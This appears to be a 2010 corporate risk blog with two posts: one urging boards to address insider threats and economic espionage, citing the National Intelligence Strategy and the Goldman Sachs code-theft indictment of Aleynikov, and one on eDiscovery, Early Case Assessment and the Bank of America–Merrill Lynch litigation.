23 February 2010

NIS: Homeland Security & Economic Espionage...

The National Intelligence Strategy (NIS) of the United States was published in August of 2009.

The tone at the top of your enterprise will go a long way if you ever end up in litigation associated with the Economic Espionage Act of 1996 or even the Foreign Corrupt Practices Act. As a CxO with the ultimate responsibility for the resilience of your organization, pay attention. The internal threats to your global 500 company and the Operational Risks associated with the following Mission Objectives are the focus of this posting:

  • MO4: Integrate Counterintelligence
  • MO5: Enhance Cybersecurity

The U.S. NIS spells out these two mission objectives and for good reason. One may be obvious and we have all heard it before. 80+% of the nations critical infrastructure is owned and operated by the private sector. The reason why the Energy, Financial, and other heavy R & D sectors are being subjected to more attacks by insiders is because these assets are the most valuable in the eyes of the enemy.

The other reason that these two areas are called out in the National Intelligence Strategy is because these are the country's greatest vulnerabilities. So what can a private sector Board of Directors be doing these days to address the two mission objectives that have the greatest nexus with being vigilant and creating the correct "Tone at the Top":

  • Implement Human Factors Analysis and Risk Assessments on employees, partners, suppliers and 3rd parties.
  • Revitalize, Energize and Capitalize on redesigned policy governance, integrity management and a sound legal framework.
  • Create an aggressive corporate executive intelligence and anti-fraud program that is integrated into a robust risk management ecosystem.
  • Develop wellsprings of knowledge that engages people in a dialogue focused on intellectual property, valuable corporate assets and their nexus with national security.

The preparation for enterprise disasters has been going on in the Operational Risk environment for years. Even in the most sophisticated companies, these efforts have included the implementation of IT related disaster recovery programs and plans (DRP) as mandated by rules and laws regarding Business Continuity and Continuity of Operations. When and how often these are exercised is another matter.

The crisis management plan is sitting on the shelf next to the DRP or even might be another tab in the same three ring binder. And who knows, perhaps some Director of BCP has even convinced senior management on the use of an EOC portal. This are all fundamentals, baseline and items for every organization to have soon after establishing themselves in business.

What is still being left out, not considered a priority are the two items highlighted above from the United States National Intelligence Strategy, MO4 and MO5. These two items are an Operational Risk Management priority by the Board of Directors in each global 500 company. Why?

USAO/Southern District New York, 11 Feb 10: Mr. Aleynikov was indicted today on charges related to his theft of proprietary computer code concerning a high-frequency trading platform from his former employer, Goldman Sachs. Aleynikov was previously arrested and is expected to be arraigned in Manhattan federal court at a later date.

Beginning at approximately 5:20 p.m. on June 5, 2009 –Aleynikov s last day working at Goldman Sachs — Aleynikov , from his desk at Goldman Sachs, transferred substantial portions of Goldman Sachs’s proprietary computer code for its trading platform to an outside computer server in Germany. Aleynikov encrypted the files and transferred them over the Internet without informing Goldman Sachs. After transferring the files, Aleynikov deleted the program he used to encrypt the files and deleted his computer’s “bash history,” which records the most recent commands executed on his computer.

In addition, throughout his employment at Goldman Sachs, Aleynikov transferred thousands of computer code files related to the firm’s proprietary trading program from the firm’s computers to his home computers, without the knowledge or authorization of Goldman Sachs. Aleynikov did this by e-mailing the code files from his Goldman Sachs e-mail account to his personal e-mail account, and storing versions of the code files on his home computers, laptop computer, a flash drive, and other storage devices.


The theft of trade secrets, economic espionage and the movement of data that may have business oriented implications may also have national security impacts. Whether it's going to a competitor or into the hands of foreign entities is not the priority issue. Let's be very specific on this point.

If the vital secret, intellectual property or other data is copied, then how do you know if it's missing from your organization? Sensitive, classified or otherwise proprietary information that is copied and then sold or given to competitors, adversaries of our enemies requires a whole new mind set and a whole new approach to deter, detect, defend and document this behavior in the enterprise.

Aleynikov, 40, is charged with one count of theft of trade secrets, one count of transportation of stolen property in foreign commerce, and one count of unauthorized computer access. If convicted on these charges, Aleynikov faces a maximum sentence of 25 years in prison.

The case associated with competitive intelligence where intellectual property is being transferred to another U.S. company may be just as harmful to the economic fabric of our country. What is more alarming and perhaps the final questions on Operational Risk Management is this:

  1. What do we know?
  2. When did we know it?
  3. What are we going to do about it?

The Board of Directors will be asking these after the crisis is unfolding. The law enforcement investigators will be asking these soon after the immediate incident. The final and perhaps the most painful of all the people who will asking these questions are the lawyers during your deposition and in the court room. Those questions and more will be asked from the front lines of the Goldman Sachs trading pit battlefield to the highly polished tables inside the corporate Board Room.

Revisit the Mission Objectives (MO) in your organization that pertain to MO4 and MO5. It may mean the difference to your corporate shareholders, or to all the citizens of the United States of America.

05 February 2010

Legal Risk: Early Case Assessment...

After a few days at LegalTech New York this week, it's now confirmed that a very small percentage of small to medium enterprises (SME) are truly ready for the Operational Risk of litigation. How can a General Counsel achieve a defensible standard of care in this vast sea of software, technology and vendors that are trying to address the modern day business problem called "Electronic Stored Information?" (ESI)

Yet the likes of Bank of America and the Attorney General of New York are well aware of the importance of the "Meet-and-Confer" process as the allegations of fraud look for the "Digital Smoking Gun". Let the metadata wars begin:

Legal action has begun against Bank of America and its former bosses, accusing them of duping investors and taxpayers during the takeover of Merrill Lynch.

The defendants are accused of intentionally withholding details of huge losses Merrill was suffering.

New York state officials have filed the action against the bank, former chief executive Kenneth Lewis and former chief financial officer Joseph Price.


Principle 12 to the Sedona Principles states: Absent party agreement or court order specifying the form or forms of production, production should be made in the form or forms in which the information is ordinarily maintained or in a reasonably usable form, taking into account the need to produce reasonably accessible metadata that will enable the receiving party to have the same ability to access, search, and display the information as the producing party where appropriate or necessary in light of the nature of the information and the needs of the case. Sedona Principles 2d Principle 12

The issues faced by legal counsel at large Fortune 50 organizations are no different with the Small to Medium Enterprise when it comes to the "Meet-and-Confer." Making the decisions on what is relevant and the scope of eDiscovery is increasingly about the economics of litigation. Law firms are trying to reduce their costs and impact of billable hours with their clients and General Counsels are making sure that internal IT records management tasks are a top priority.

What many vendors are advocating in process and tools at LegalTech is the idea of Early Case Assessment (ECA). In other words, the Plaintiff is going to have to show their hand early and without slight of hand. These interviews with the Hon. James Holderman explains:

Editor: Doesn't that pretty much move in the direction of requiring the plaintiff to provide specific facts about the basis for the complaint? How can the discoverable "ESI" to be preserved and produced be determined unless the plaintiff comes forward with the specific facts on which its case is based?

Holderman: It cannot be done, and that is why the plaintiff needs to cooperate by divulging that information at the outset. Hiding the ball is a concept from the last century that can't be a part of present-day litigation. This is reflected in the Supreme Court's decisions in Iqbal and Twombly . Discovery is expensive and let's get the information out early. What is the benefit of bare-bones pleadings when the expense of e-discovery is so great? If the plaintiff has information then let's see whether the plaintiff has a sufficient basis for going forward to withstand a motion for summary judgment.


Where is the information you seek? In more places than you may realize as the investigation, forensics collection and rules of evidence are engaged. The risk of sanctions is real. The analysis of custodians Blackberry e-mails, BBM's and just plain text messages will be overwhelming as the Attorney General builds the case for fraud. The US Treasury, Federal Reserve and other government agencies will also be producing Terabytes of data for inquiry.

Regardless of the General Counsel's approaches at Bank of America or Merrill, the key risk items that they should have been addressing long before this trial with outside counsel are some of the following topics, again from LegalTech:

  • Cloud-based email and records management provides a new approach for cost-effectively managing law firm content
  • Securely archive information assets and maintain compliance with all regulatory standards, including the FRCP
  • Meaning Based Computing to enable automatic categorization of ESI for the application of retention policies
  • Sophisticated retention policies that enable non-critical data to be purged appropriately
  • The ability to easily and transparently retrieve archived data, prepare the data for potential future legal holds or preservation, and to rapidly respond to a litigation and investigation pertaining to the firm
  • How has legal changed the way we think about back-up?
  • What does "inaccessible" mean in discovery?
  • How can you implement a reasonable, defensible information management strategy that reduces risk?
As a law firm you always have to look at the fine print. B of A's procedures with outside counsel are available for review online:

These Procedures shall constitute the written engagement, or contract, of the firm for any matter for which it is engaged on behalf of Bank of America, and shall govern the terms of the engagement. These Procedures are applicable to all law firms and attorneys providing legal services to Bank of America. Law firms retained by Bank of America should ensure that a copy of these Procedures is provided to all attorneys, paralegals, administrative, clerical or other assistants assigned to a particular matter before work begins on any matter.